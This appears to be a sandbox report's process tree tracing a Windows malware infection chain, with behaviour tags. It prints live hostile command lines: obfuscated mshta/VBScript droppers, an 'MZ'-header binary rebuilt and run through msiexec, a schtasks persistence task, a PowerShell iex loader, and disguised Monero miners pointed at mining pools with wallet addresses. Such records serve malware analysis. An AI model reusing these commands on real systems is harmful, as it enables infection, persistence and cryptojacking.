C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe"C:\Users\Admin\AppData\Local\Temp\5ktv2cn1.v0q\any.exe" -u13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exe /mixfive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ixviuwuy.n2h\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 50108 -s 23613⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wgkexly.ako\autosubplayer.exe /S & exit11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exe /eufive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g0p513gb.sxl\GcleanerEU.exe /eufive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 48612 -s 23213⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe /qn CAMPAIGN="654" & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exeC:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe /qn CAMPAIGN="654"12⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\wyfa0x54.dnq\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635514877 /qn CAMPAIGN=""654"" " CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exeC:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe12⤵
-
C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe"C:\Users\Admin\AppData\Local\Temp\ohqmuati.t4d\any.exe" -u13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exe /mixfive & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\vxvin3pr.tr3\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 30588 -s 23613⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zazmh5qd.xqr\autosubplayer.exe /S & exit11⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03ea09aa5c9686e5.exeSun03ea09aa5c9686e5.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2838193.exe"C:\Users\Admin\AppData\Roaming\2838193.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\997740.exe"C:\Users\Admin\AppData\Roaming\997740.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\1959615.exe"C:\Users\Admin\AppData\Roaming\1959615.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3392017.exe"C:\Users\Admin\AppData\Roaming\3392017.exe"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT( "WSCRiPT.SHelL" ). RuN("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\3392017.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN (""C:\Users\Admin\AppData\Roaming\3392017.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0,trUe ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\3392017.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq &If "" =="" for %T IN ("C:\Users\Admin\AppData\Roaming\3392017.exe") do taskkill -iM "%~nxT" -f11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "3392017.exe" -f12⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\1462013.exe"C:\Users\Admin\AppData\Roaming\1462013.exe"9⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"10⤵
-
C:\Users\Admin\AppData\Roaming\5295647.exe"C:\Users\Admin\AppData\Roaming\5295647.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3956 -s 2969⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"8⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6020 -s 17129⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 6129⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"10⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1900 -s 22609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1900 -s 22609⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exeSun03f5d51697d04.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1CHD0.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-1CHD0.tmp\Sun03f5d51697d04.tmp" /SL5="$8002A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe" /SILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-OJ03F.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-OJ03F.tmp\Sun03f5d51697d04.tmp" /SL5="$4015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f5d51697d04.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SO44T.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-SO44T.tmp\postback.exe" ss110⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0351a0558292.exeSun0351a0558292.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe5⤵
-
C:\Windows\SysWOW64\control.exe"C:\Windows\SysWOW64\control.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\dyEvj3hC2t7OMuwoWXdKUmK3.exe"3⤵
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\E26D.exeC:\Users\Admin\AppData\Local\Temp\E26D.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E26D.exeC:\Users\Admin\AppData\Local\Temp\E26D.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\6A4B.exeC:\Users\Admin\AppData\Local\Temp\6A4B.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\B9C4.exeC:\Users\Admin\AppData\Local\Temp\B9C4.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX7\mannishly.bat" "3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX7\bifurcation.exebifurcation.exe -p"xicyqwllwklawixvurbiyphwsjuxiq"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX8\beadroll.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX8\beadroll.exe"5⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 19286⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 19286⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\DB08.exeC:\Users\Admin\AppData\Local\Temp\DB08.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 2363⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\3176.exeC:\Users\Admin\AppData\Local\Temp\3176.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 3963⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7AD5.exeC:\Users\Admin\AppData\Local\Temp\7AD5.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\BAEC.exeC:\Users\Admin\AppData\Local\Temp\BAEC.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\BAEC.exeC:\Users\Admin\AppData\Local\Temp\BAEC.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\6A96.exeC:\Users\Admin\AppData\Local\Temp\6A96.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\C866.exeC:\Users\Admin\AppData\Local\Temp\C866.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe"C:\Program Files (x86)\Mrbnhc\xfatghhxptwtr.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\37F1.exeC:\Users\Admin\AppData\Local\Temp\37F1.exe2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\hosts.bat" "3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"5⤵
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups5⤵
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller5⤵
-
C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"C:\Users\Admin\AppData\Roaming\fontdrvhost.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15296 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"5⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 49YaCLR6euq4TAt1Nj42ZeHFmJGdFGJspjjfpWNUaw7jb6L14vAvMZSh27tmKVBivE657AgHGP8XcKVv92D7vtVfQG2ckXx.RIG1 -p x --algo rx/06⤵
-
C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"C:\Users\Admin\AppData\Local\Temp\QUKHyXjH3qRKVkqx.exe"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\7w7FkvGJ.json"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵
- Accesses Microsoft Outlook accounts
-
C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"C:\Users\Admin\AppData\Local\Temp\lp4ZRyw0RpGtlIBV.exe"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com6⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\lp4ZRyw0.json"5⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵
-
C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 39228 -s 2566⤵
-
C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"C:\Users\Admin\AppData\Local\Temp\AbcatT5YrtyGV4Gv.exe"5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 40452 -s 2926⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\a4755c5f\plg\7F0zW8sl.json"5⤵
-
C:\Users\Admin\AppData\Local\Win32\WindowsUpdate.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"6⤵
-
C:\Users\Admin\AppData\Local\Temp\D7FA.exeC:\Users\Admin\AppData\Local\Temp\D7FA.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13208 -s 2883⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe dcd4e2d229e6a204038c8ed072934241 t3kpkbwC006FvUI4chaFNw.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exeSun03f0dc4460bc9.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exeC:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun03f0dc4460bc9.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\mk.exe"C:\Users\Admin\AppData\Local\Temp\mk.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC787B2F3\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
